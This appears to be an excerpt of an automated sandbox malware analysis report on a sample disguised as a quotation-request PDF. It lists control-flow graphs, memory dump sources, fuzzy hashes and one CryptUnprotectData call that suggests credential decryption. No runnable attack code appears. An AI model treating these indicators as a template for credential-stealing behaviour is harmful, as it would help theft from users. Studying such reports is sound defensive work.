                                                                                                                                  control_flow_graph 735 d5f90-d5fc6 860 d5fc8 call d5f90 735->860 861 d5fc8 call d60e0 735->861 736 d5fce-d5fd4 737 d6024-d6028 736->737 738 d5fd6-d5fda 736->738 739 d603f-d6053 737->739 740 d602a-d6039 737->740 741 d5fdc-d5fe1 738->741 742 d5fe9-d5ff0 738->742 862 d6055 call d90a8 739->862 863 d6055 call d8d90 739->863 864 d6055 call d8da0 739->864 743 d603b-d603d 740->743 744 d6065-d606f 740->744 741->742 745 d60c6-d6103 742->745 746 d5ff6-d5ffd 742->746 747 d605b-d6062 743->747 748 d6079-d607d 744->748 749 d6071-d6077 744->749 756 d610e-d612e 745->756 757 d6105-d610b 745->757 746->737 750 d5fff-d6003 746->750 751 d6085-d60bf 748->751 753 d607f 748->753 749->751 754 d6005-d600a 750->754 755 d6012-d6019 750->755 751->745 753->751 754->755 755->745 758 d601f-d6022 755->758 763 d6135-d613c 756->763 764 d6130 756->764 757->756 758->747 766 d613e-d6149 763->766 767 d64c4-d64cd 764->767 768 d614f-d6162 766->768 769 d64d5-d64fe 766->769 774 d6178-d6193 768->774 775 d6164-d6172 768->775 779 d6195-d619b 774->779 780 d61b7-d61ba 774->780 775->774 778 d644c-d6453 775->778 778->767 785 d6455-d6457 778->785 783 d619d 779->783 784 d61a4-d61a7 779->784 781 d6314-d631a 780->781 782 d61c0-d61c3 780->782 786 d6406-d6409 781->786 787 d6320-d6325 781->787 782->781 788 d61c9-d61cf 782->788 783->781 783->784 783->786 789 d61da-d61e0 783->789 784->789 790 d61a9-d61ac 784->790 791 d6459-d645e 785->791 792 d6466-d646c 785->792 795 d640f-d6415 786->795 796 d64d0 786->796 787->786 788->781 794 d61d5 788->794 797 d61e6-d61e8 789->797 798 d61e2-d61e4 789->798 799 d6246-d624c 790->799 800 d61b2 790->800 791->792 792->769 793 d646e-d6473 792->793 801 d64b8-d64bb 793->801 802 d6475-d647a 793->802 794->786 804 d643a-d643e 795->804 805 d6417-d641f 795->805 796->769 806 d61f2-d61fb 797->806 798->806 799->786 803 d6252-d6258 799->803 800->786 801->796 814 d64bd-d64c2 801->814 802->796 807 d647c 802->807 808 d625e-d6260 803->808 809 d625a-d625c 803->809 804->778 813 d6440-d6446 804->813 805->769 810 d6425-d6434 805->810 811 d61fd-d6208 806->811 812 d620e-d6236 806->812 815 d6483-d6488 807->815 816 d626a-d6281 808->816 809->816 810->774 810->804 811->786 811->812 834 d623c-d6241 812->834 835 d632a-d6360 812->835 813->766 813->778 814->767 814->785 817 d64aa-d64ac 815->817 818 d648a-d648c 815->818 827 d62ac-d62d3 816->827 828 d6283-d629c 816->828 817->796 825 d64ae-d64b1 817->825 822 d648e-d6493 818->822 823 d649b-d64a1 818->823 822->823 823->769 826 d64a3-d64a8 823->826 825->801 826->817 830 d647e-d6481 826->830 827->796 840 d62d9-d62dc 827->840 828->835 838 d62a2-d62a7 828->838 830->796 830->815 834->835 841 d636d-d6375 835->841 842 d6362-d6366 835->842 838->835 840->796 843 d62e2-d630b 840->843 841->796 846 d637b-d6380 841->846 844 d6368-d636b 842->844 845 d6385-d6389 842->845 843->835 858 d630d-d6312 843->858 844->841 844->845 847 d63a8-d63ac 845->847 848 d638b-d6391 845->848 846->786 851 d63ae-d63b4 847->851 852 d63b6-d63d5 call d66b8 847->852 848->847 850 d6393-d639b 848->850 850->796 853 d63a1-d63a6 850->853 851->852 855 d63db-d63df 851->855 852->855 853->786 855->786 856 d63e1-d63fd 855->856 856->786 858->835 860->736 861->736 862->747 863->747 864->747
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (o]q$(o]q$,aq$,aq
                                                                                                                                  • API String ID: 0-1947289240
                                                                                                                                  • Opcode ID: e2f3f9350bf2bed430863cb9b4a057e48cd8509d3743f6c3fb7dc401782e39bf
                                                                                                                                  • Instruction ID: b06a7036923acf7d96db6f93bca9c93a347d6793444682eb907d6be048bb9188
                                                                                                                                  • Opcode Fuzzy Hash: e2f3f9350bf2bed430863cb9b4a057e48cd8509d3743f6c3fb7dc401782e39bf
                                                                                                                                  • Instruction Fuzzy Hash: CB023D30A00219DFCB55CFA9C984AAEBBF2FF49314F55806AE805AB361D732DD41CB61
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
                                                                                                                                  • Opcode ID: 94fc5e09a02cb1c1aeae3652342a693112f3564128da8f914932bccdfc2bda9b
                                                                                                                                  • Instruction ID: c2c341a600568ccc1ca847b054129e673bf41baeacd0cc2b4bbce27c98e53c91
                                                                                                                                  • Opcode Fuzzy Hash: 94fc5e09a02cb1c1aeae3652342a693112f3564128da8f914932bccdfc2bda9b
                                                                                                                                  • Instruction Fuzzy Hash: 0D82E374A00229CFDB25DF64D994BADBBB2FF89300F1084A9D80967365DB359E82CF54
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
                                                                                                                                  • Opcode ID: 3e1f181ed8fbd52bd84aedc82d1e4f72027b8bbe244f0a6e78cd1240c1ace1a5
                                                                                                                                  • Instruction ID: e2d7203f7167a40ab57995d90c0e76af6a439d39f91dd9359256361f9548daf9
                                                                                                                                  • Opcode Fuzzy Hash: 3e1f181ed8fbd52bd84aedc82d1e4f72027b8bbe244f0a6e78cd1240c1ace1a5
                                                                                                                                  • Instruction Fuzzy Hash: 8072F374A00219CFDB24DF64D954BADBBB2FF89301F1084A9D809A73A5DB319E82CF54
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 37CADA45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                  • Opcode ID: 291115f2cd77ed5cc0a848aa22bc08d447f96721984a5dfe348fc7889f745ebe
                                                                                                                                  • Instruction ID: 325e409d2b4d6357cd13b402c85b3753dd6f9ad604df57dfe6d45b259f7321a1
                                                                                                                                  • Opcode Fuzzy Hash: 291115f2cd77ed5cc0a848aa22bc08d447f96721984a5dfe348fc7889f745ebe
                                                                                                                                  • Instruction Fuzzy Hash: D61119B6800249EFDB10CF99C945BDEBFF5EF48320F148419E618A7210C739A554DFA5
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 37CADA45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                  • Opcode ID: 462ab6bbc7aedb495eacc541c1ab7b3ecb0cabaae822564534ad60915e46e426
                                                                                                                                  • Instruction ID: 0c2bd9880e0d0256038be19bc3b92bc940767ce3b4965073dacf0a7c001fe33c
                                                                                                                                  • Opcode Fuzzy Hash: 462ab6bbc7aedb495eacc541c1ab7b3ecb0cabaae822564534ad60915e46e426
                                                                                                                                  • Instruction Fuzzy Hash: 9D1116B6800249EFDB10CF99C945BDEBFF4EF48320F148419E618A7210C739A994DFA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 91e262bee7fb69d6e7d98038c7d87fdfdecc5060bf50eff2109873692eaff962
                                                                                                                                  • Instruction ID: c992a9641b93db0bcc7a36c13a33b692c0b1eb21141798d39c7f0231a6063c93
                                                                                                                                  • Opcode Fuzzy Hash: 91e262bee7fb69d6e7d98038c7d87fdfdecc5060bf50eff2109873692eaff962
                                                                                                                                  • Instruction Fuzzy Hash: A872BC74E012288FEB64DF69C980BD9FBB2BB49311F5491EAD409A7351DB34AE81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 12e65acd7b0b077fdacfe89b07272df9cd39c8e5b7483b7cea693ab8a52a64b4
                                                                                                                                  • Instruction ID: 607e97c3170eaf615e4ccb3b547d326d46335377da40de45844d30f721959007
                                                                                                                                  • Opcode Fuzzy Hash: 12e65acd7b0b077fdacfe89b07272df9cd39c8e5b7483b7cea693ab8a52a64b4
                                                                                                                                  • Instruction Fuzzy Hash: 4BE1D274E01218CFEB64CFA9D984B9DBBB2BF49301F1081AAD408B7291DB355E85CF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6a5c0f28f8568e957d3663a353db3ca7d149f6c0d7bda91b78bb1027cd7c37c6
                                                                                                                                  • Instruction ID: d8a65f3fcecd60fb43744c60af2cbc069d32c9bd416f33b1575b90df938eae6f
                                                                                                                                  • Opcode Fuzzy Hash: 6a5c0f28f8568e957d3663a353db3ca7d149f6c0d7bda91b78bb1027cd7c37c6
                                                                                                                                  • Instruction Fuzzy Hash: 88C1A074E00218CFDB54DFA5C994BADBBB2FF89301F1080A9D809A7365DB359A85CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9655ee6a58e74ed7cb43e3c45324a19bb08c1a4ac008924fc43a1ea5930d4936
                                                                                                                                  • Instruction ID: e47ff91909581c1497e78d61af60e6c36ba2ea3f157de4dff479949f9d6a8211
                                                                                                                                  • Opcode Fuzzy Hash: 9655ee6a58e74ed7cb43e3c45324a19bb08c1a4ac008924fc43a1ea5930d4936
                                                                                                                                  • Instruction Fuzzy Hash: 3BA10574D00209CFDB14DFA9C994BDDBBB1FF88315F208269E408AB2A2DB749985CF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 82e8f9632f2d7c18b4da95bc9213ba2e053bd943effe1ca3b9516459f77d4f90
                                                                                                                                  • Instruction ID: 871ffeacd3a4f2323e12e75a1efac8794166591629f337cbcfece771d8d603f3
                                                                                                                                  • Opcode Fuzzy Hash: 82e8f9632f2d7c18b4da95bc9213ba2e053bd943effe1ca3b9516459f77d4f90
                                                                                                                                  • Instruction Fuzzy Hash: 98A1F270D002098FEB14DFA9C994BDDBBB1FF88315F208269E408AB2A1DB749985CF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 55f81e685eb8326a1cc7695f852001b7912fc2f3947adaeb4b1349e920f98bd0
                                                                                                                                  • Instruction ID: a1c78fad0e2b7ac8cd0f4861c04d3a790bbeffecd6c5fc157141cc8fe097cf8a
                                                                                                                                  • Opcode Fuzzy Hash: 55f81e685eb8326a1cc7695f852001b7912fc2f3947adaeb4b1349e920f98bd0
                                                                                                                                  • Instruction Fuzzy Hash: 83A190B4E012288FEB14CF6AC944B9DFBF2AF89310F14C0AAD409B7255DB745A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f90933788ef95d629ccc5bb64bf69599442b7172adb5f1dfd6263ae81057d566
                                                                                                                                  • Instruction ID: 774b1b6a6c6b80f46e9e70cdaeddc17037d2e19eaec0dfdeb40239f2e8b05948
                                                                                                                                  • Opcode Fuzzy Hash: f90933788ef95d629ccc5bb64bf69599442b7172adb5f1dfd6263ae81057d566
                                                                                                                                  • Instruction Fuzzy Hash: 77A190B5E012288FEB14CF6AC984B9DFBF2AF89310F54D0AAD408A7255DB345A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 26b56e5fe29fbef8499770601bbe466bd3c41966302d2409f14143852c923dba
                                                                                                                                  • Instruction ID: 24e30f45072577e22a360342c9312a7b20c753ded37ba7a4d3a8f5e85399a070
                                                                                                                                  • Opcode Fuzzy Hash: 26b56e5fe29fbef8499770601bbe466bd3c41966302d2409f14143852c923dba
                                                                                                                                  • Instruction Fuzzy Hash: F4A192B5E012288FEB14CF6AC944B9DFBF2BF89310F14D0AAD409A7255DB345A85CF11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c9cf055c10b9ec37f3c585dd45de0149a148d25b3c82ebfe4533aca27f166ae8
                                                                                                                                  • Instruction ID: 20a4a8f658af04b82c092073f854a25e497e2aec72bd151a259b5142cc04d616
                                                                                                                                  • Opcode Fuzzy Hash: c9cf055c10b9ec37f3c585dd45de0149a148d25b3c82ebfe4533aca27f166ae8
                                                                                                                                  • Instruction Fuzzy Hash: 39A181B5E012288FEB14CF6AC984B9DFBF2BB89310F14D1AAD408A7255DB345A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 351a055e96d3f8731ed85fc5f35523f662a0eabdede428e5baa2555249222273
                                                                                                                                  • Instruction ID: f63d0df8dd811715aa8890663b3cb98c7582c2a22bc7e21516e261517df86bd5
                                                                                                                                  • Opcode Fuzzy Hash: 351a055e96d3f8731ed85fc5f35523f662a0eabdede428e5baa2555249222273
                                                                                                                                  • Instruction Fuzzy Hash: F791FE74900209CFEB50DFA8C998BDCBBB1FF49311F208269E409BB291EB749985CF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8ab79bdd7c3455efa9a81ddbcd8f17bd3157c18f40b12381d6d90a7749be5c4a
                                                                                                                                  • Instruction ID: 7e77d21e18f2c9c91cd228297ecf79bb3d3821fbb92c7e5c84b09ecb50c822c2
                                                                                                                                  • Opcode Fuzzy Hash: 8ab79bdd7c3455efa9a81ddbcd8f17bd3157c18f40b12381d6d90a7749be5c4a
                                                                                                                                  • Instruction Fuzzy Hash: E981E174E012088BDF08DFAAD9906DDBBF2BF88310F64D529E414AB399DB349942CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6dbd3e27578f6e2fdd9a3eb83184ff391f2d4e886200a5eda77b88e14ec1b7fa
                                                                                                                                  • Instruction ID: dab5f64bca6331e1c22a0be7561cd9a4fd3056fdde692ab32770507dee17e05d
                                                                                                                                  • Opcode Fuzzy Hash: 6dbd3e27578f6e2fdd9a3eb83184ff391f2d4e886200a5eda77b88e14ec1b7fa
                                                                                                                                  • Instruction Fuzzy Hash: 0B71B475E01628CFDB64CF66D9807DDFBB2BF89310F1491AAD409A7260DB359A86CF40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e17c46e158e42d8ef2caa9b411179143b50755c5b4fc7a089bdd0472461313a8
                                                                                                                                  • Instruction ID: 0f6a89d46a01750d8af51b183979703ab7aa57ead61d66edb05ab5d042d7c24c
                                                                                                                                  • Opcode Fuzzy Hash: e17c46e158e42d8ef2caa9b411179143b50755c5b4fc7a089bdd0472461313a8
                                                                                                                                  • Instruction Fuzzy Hash: 978192B5E006288FEB68CF6AC94479DFBF2AF89310F14C0AAD40DA7255DB345A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e8fc7e9302de90818a9e157a52f36bafe6d1f2c51a856f53f48a60e39bc0ff12
                                                                                                                                  • Instruction ID: 6e49c0a7fd1e4203ca14aca26daf0f7b801e5acd0e32c986c82c7c0a3b436cc8
                                                                                                                                  • Opcode Fuzzy Hash: e8fc7e9302de90818a9e157a52f36bafe6d1f2c51a856f53f48a60e39bc0ff12
                                                                                                                                  • Instruction Fuzzy Hash: 5D7193B5E01618CFEB28CF6AC944B99FBF2AF88300F14C1AAD40DA7255DB345A85CF11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5e7fd24e63f1b5e5bfd2fb097b49a49a2588f088aac13a8474cd1bf35e4e8047
                                                                                                                                  • Instruction ID: 710622cf2b0fca3af85fcb5b0d74be6c22bccbec3e8f00c2c115f7c1f4a90cf3
                                                                                                                                  • Opcode Fuzzy Hash: 5e7fd24e63f1b5e5bfd2fb097b49a49a2588f088aac13a8474cd1bf35e4e8047
                                                                                                                                  • Instruction Fuzzy Hash: 32618B74A40259CFDB25CF61D944BADBBB6FF88300F1088AA980A773A5DB355D82DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 617cb37c97c81a9feb6d87d78b3f4ab29903526d5e0d5f57e54532de75441e0f
                                                                                                                                  • Instruction ID: 5171911f226c000d0ff53924ba760f0c7705cadc2fa7f1ab192a0fbefffcb6b2
                                                                                                                                  • Opcode Fuzzy Hash: 617cb37c97c81a9feb6d87d78b3f4ab29903526d5e0d5f57e54532de75441e0f
                                                                                                                                  • Instruction Fuzzy Hash: 204178B1E016188BEB58CF6BCD44789FBF3AFC9314F14C1AAC50CA6265DB740A868F51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ef5a9166ed00fd909a710512c1614f06cd1578c8a411189186577787e87649e1
                                                                                                                                  • Instruction ID: f8cfebc4e6c090cbe0f80d5ce94e7b1b3c59c2e5b6ce5a9b22032419e4b86391
                                                                                                                                  • Opcode Fuzzy Hash: ef5a9166ed00fd909a710512c1614f06cd1578c8a411189186577787e87649e1
                                                                                                                                  • Instruction Fuzzy Hash: 934157B1E016188BEB58CF6BC9457C9FBF3AFC9214F14C1AAC50CA6264DB740A868F51

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 d66b8-d66ed 1 d6b1c-d6b20 0->1 2 d66f3-d6716 0->2 3 d6b39-d6b47 1->3 4 d6b22-d6b36 1->4 11 d671c-d6729 2->11 12 d67c4-d67c8 2->12 9 d6b49-d6b5e 3->9 10 d6bb8-d6bcd 3->10 18 d6b65-d6b72 9->18 19 d6b60-d6b63 9->19 20 d6bcf-d6bd2 10->20 21 d6bd4-d6be1 10->21 25 d6738 11->25 26 d672b-d6736 11->26 15 d67ca-d67d8 12->15 16 d6810-d6819 12->16 15->16 30 d67da-d67f5 15->30 22 d6c2f 16->22 23 d681f-d6829 16->23 27 d6b74-d6bb5 18->27 19->27 28 d6be3-d6c1e 20->28 21->28 31 d6c34-d6c4d 22->31 23->1 29 d682f-d6838 23->29 32 d673a-d673c 25->32 26->32 71 d6c25-d6c2c 28->71 35 d683a-d683f 29->35 36 d6847-d6853 29->36 55 d67f7-d6801 30->55 56 d6803 30->56 32->12 39 d6742-d67a4 32->39 35->36 36->31 37 d6859-d685f 36->37 43 d6865-d6875 37->43 44 d6b06-d6b0a 37->44 84 d67aa-d67c1 39->84 85 d67a6 39->85 57 d6889-d688b 43->57 58 d6877-d6887 43->58 44->22 48 d6b10-d6b16 44->48 48->1 48->29 59 d6805-d6807 55->59 56->59 60 d688e-d6894 57->60 58->60 59->16 66 d6809 59->66 60->44 67 d689a-d68a9 60->67 66->16 68 d68af 67->68 69 d6957-d6982 call d6500 * 2 67->69 73 d68b2-d68c3 68->73 86 d6a6c-d6a86 69->86 87 d6988-d698c 69->87 73->31 75 d68c9-d68db 73->75 75->31 78 d68e1-d68f9 75->78 140 d68fb call d6c88 78->140 141 d68fb call d6c98 78->141 80 d6901-d6911 80->44 83 d6917-d691a 80->83 88 d691c-d6922 83->88 89 d6924-d6927 83->89 84->12 85->84 86->1 107 d6a8c-d6a90 86->107 87->44 90 d6992-d6996 87->90 88->89 91 d692d-d6930 88->91 89->22 89->91 94 d69be-d69c4 90->94 95 d6998-d69a5 90->95 96 d6938-d693b 91->96 97 d6932-d6936 91->97 99 d69ff-d6a05 94->99 100 d69c6-d69ca 94->100 110 d69b4 95->110 111 d69a7-d69b2 95->111 96->22 98 d6941-d6945 96->98 97->96 97->98 98->22 105 d694b-d6951 98->105 102 d6a07-d6a0b 99->102 103 d6a11-d6a17 99->103 100->99 106 d69cc-d69d5 100->106 102->71 102->103 108 d6a19-d6a1d 103->108 109 d6a23-d6a25 103->109 105->69 105->73 112 d69e4-d69fa 106->112 113 d69d7-d69dc 106->113 114 d6acc-d6ad0 107->114 115 d6a92-d6a9c call d53a8 107->115 108->44 108->109 116 d6a5a-d6a5c 109->116 117 d6a27-d6a30 109->117 118 d69b6-d69b8 110->118 111->118 112->44 113->112 114->71 120 d6ad6-d6ada 114->120 115->114 128 d6a9e-d6ab3 115->128 116->44 125 d6a62-d6a69 116->125 123 d6a3f-d6a55 117->123 124 d6a32-d6a37 117->124 118->44 118->94 120->71 126 d6ae0-d6aed 120->126 123->44 124->123 131 d6afc 126->131 132 d6aef-d6afa 126->132 128->114 137 d6ab5-d6aca 128->137 134 d6afe-d6b00 131->134 132->134 134->44 134->71 137->1 137->114 140->80 141->80
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
